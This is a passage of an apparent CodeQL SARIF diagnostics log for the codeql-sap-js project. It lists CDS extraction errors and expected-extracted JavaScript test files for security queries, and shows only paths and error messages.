Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":183},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds","uriBaseId":"%SRCROOT%","index":184},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds","uriBaseId":"%SRCROOT%","index":185},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds","uriBaseId":"%SRCROOT%","index":187},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds","uriBaseId":"%SRCROOT%","index":192},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds","uriBaseId":"%SRCROOT%","index":194},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds","uriBaseId":"%SRCROOT%","index":196},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":201},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":207},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":208},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":210},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":214},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":216},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":218},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":222},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":224},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":226},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":229},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":232},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds","uriBaseId":"%SRCROOT%","index":237},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js","uriBaseId":"%SRCROOT%","index":400}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":109}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.js","uriBaseId":"%SRCROOT%","index":238}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":285}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/server.js","uriBaseId":"%SRCROOT%","index":198}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js","uriBaseId":"%SRCROOT%","index":408}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/server.js","uriBaseId":"%SRCROOT%","index":151}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":231}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js","uriBaseId":"%SRCROOT%","index":176}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":563}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":425}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js","uriBaseId":"%SRCROOT%","index":407}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/esbuild.config.mjs","uriBaseId":"%SRCROOT%","index":32}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":443}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":215}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":179}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":385}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":435}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":461}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":332}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js","uriBaseId":"%SRCROOT%","index":536}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js","uriBaseId":"%SRCROOT%","index":161}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js","uriBaseId":"%SRCROOT%","index":549}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":294}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":547}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":382}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":583}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":376}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":555}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js","uriBaseId":"%SRCROOT%","index":410}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/srv/service2.js","uriBaseId":"%SRCROOT%","index":156}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js","uriBaseId":"%SRCROOT%","index":413}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.js","uriBaseId":"%SRCROOT%","index":225}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js","uriBaseId":"%SRCROOT%","index":191}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/eslint.config.mjs","uriBaseId":"%SRCROOT%","index":33}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":565}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBas